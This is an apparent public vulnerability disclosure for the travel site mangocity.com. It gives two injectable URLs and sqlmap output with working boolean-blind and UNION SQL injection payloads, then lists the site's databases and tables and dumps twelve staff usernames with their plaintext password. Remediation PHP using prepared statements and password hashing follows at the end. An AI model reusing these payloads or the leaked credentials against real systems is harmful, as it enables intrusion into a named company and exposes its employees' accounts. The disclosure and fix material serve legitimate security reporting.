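2015-06-30: Details reported to the vendor; awaiting vendor response
2015-07-05: The vendor chose to ignore the vulnerability; details disclosed publicly
As stated in the title.
SQL injection on the main site; passwords stored in plaintext
Injection point 1:
http://www.mangocity.com/product/10506752p2.html?type=90&c=cholidayindexcontroller&m=comindex&d=grouptravel
The type parameter is injectable.
Injection point 2:
http://www.mangocity.com/index.php/freeline/productinfo_controller/journey_print?thirdpartid=214412p2
The thirdpartid parameter is injectable.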
sqlmap identified the following injection points with a total of 183 HTTP(s) requests:
---
Parameter: type (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=90 AND 1118=1118&c=cholidayindexcontroller&m=comindex&d=grouptravel

    Type: UNION query
    Title: MySQL UNION query (90) - 9 columns
    Payload: type=-4130 UNION ALL SELECT 90,90,90,90,90,90,90,90,CONCAT(0x7176787171,0x4c736767644348706b7a,0x7178706271)#&c=cholidayindexcontroller&m=comindex&d=grouptravel
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL >= 5.0.0
current user: 'vacation@10.10.4.55'
current database: 'vacation_init'
current user is DBA: False
available databases [3]:
[*] information_schema
[*] test
[*] vacation_init

Database: vacation_init
[37 tables]
+-----------------------------+
| album                       |
| album_relationships         |
| business_module             |
| business_module_bak20150419 |
| business_type               |
| common_config               |
| keyword                     |
| media                       |
| pm_params                   |
| pm_tui                      |
| pm_tui_bak20150618          |
| product                     |
| product_accommodation       |
| product_additional          |
| product_album               |
| product_arrival             |
| product_departure           |
| product_departure_month     |
| product_detail              |
| product_detail_item         |
| product_extra               |
| product_itinerary           |
| product_journey             |
| product_journey_album       |
| product_journey_event       |
| product_journey_event_album |
| product_lineinfo            |
| product_scenery             |
| product_tag                 |
| product_theme               |
| product_type                |
| temp_update_product         |
| term_relationships          |
| term_taxonomy               |
| terms                       |
| user_role                   |
| users                       |
+-----------------------------+

Database: vacation_init
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(10) |
| roleId   | int(10)     |
| username | varchar(20) |
+----------+-------------+

Database: vacation_init
Table: users
[12 entries]
+-------------+-----------+--------+
| username    | password  | roleId |
+-------------+-----------+--------+
| chenhuan    | mango2015 | 0      |
| chenjie     | mango2015 | 0      |
| cms         | mango2015 | 0      |
| liuchunyan  | mango2015 | 0      |
| panwei      | mango2015 | 0      |
| pengwenhui  | mango2015 | 0      |
| renxianglin | mango2015 | 0      |
| songwanbing | mango2015 | 0      |
| sunbaoyu    | mango2015 | 0      |
| wuhongbo    | mango2015 | 0      |
| xujia       | mango2015 | 0      |
| zhanglan    | mango2015 | 0      |
+-------------+-----------+--------+
Filter the parameters, and change password storage to encrypted storage.
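The fix recommended above, as an added example that is not part of the original report or the vendor's code: the type parameter is validated as an integer and bound to a prepared statement, and passwords are stored with PHP's one-way password_hash (PHP 5.5 or later) rather than reversible encryption. The product table layout, demo_user, the sample passwords and the in-memory SQLite database standing in for MySQL are assumptions; the users columns follow the report, with password widened from varchar(10) so that a hash fits.

```php
<?php
// Added example. SQLite in memory stands in for MySQL; rows are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE product (id INTEGER PRIMARY KEY, type INTEGER, name TEXT)');
$db->exec("INSERT INTO product (type, name) VALUES (90, 'constructed tour A')");
// Assumption: password widened from the reported varchar(10), which cannot
// hold a password_hash() result (60 characters for bcrypt).
$db->exec('CREATE TABLE users (username VARCHAR(20) PRIMARY KEY,
                               password VARCHAR(255), roleId INTEGER)');

// Parameter filtering: accept only a positive integer, then bind it so the
// value can never become part of the SQL text.
function productsByType(PDO $db, $rawType)
{
    $type = filter_var($rawType, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($type === false) {
        return null; // invalid input: the caller answers 400 and no query runs
    }
    $stmt = $db->prepare('SELECT name FROM product WHERE type = :type');
    $stmt->bindValue(':type', $type, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Password storage: keep only a salted one-way hash, never the password.
function createUser(PDO $db, $username, $password, $roleId)
{
    $stmt = $db->prepare('INSERT INTO users (username, password, roleId) VALUES (?, ?, ?)');
    $stmt->execute([$username, password_hash($password, PASSWORD_DEFAULT), $roleId]);
}

function checkLogin(PDO $db, $username, $password)
{
    $stmt = $db->prepare('SELECT password FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $hash = $stmt->fetchColumn(); // false when the user does not exist
    return is_string($hash) && password_verify($password, $hash);
}

var_dump(productsByType($db, '90'));               // well-formed request
var_dump(productsByType($db, '90 AND 1118=1118')); // boolean-blind payload from the report
createUser($db, 'demo_user', 'constructed-passphrase', 0);
var_dump(checkLogin($db, 'demo_user', 'constructed-passphrase'));
var_dump(checkLogin($db, 'demo_user', 'constructed-wrong-guess'));
```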
Severity: No impact (ignored by vendor)
Ignored at: 2015-07-05 09:44
Vulnerability Rank: 15 (WooYun rating)
None yet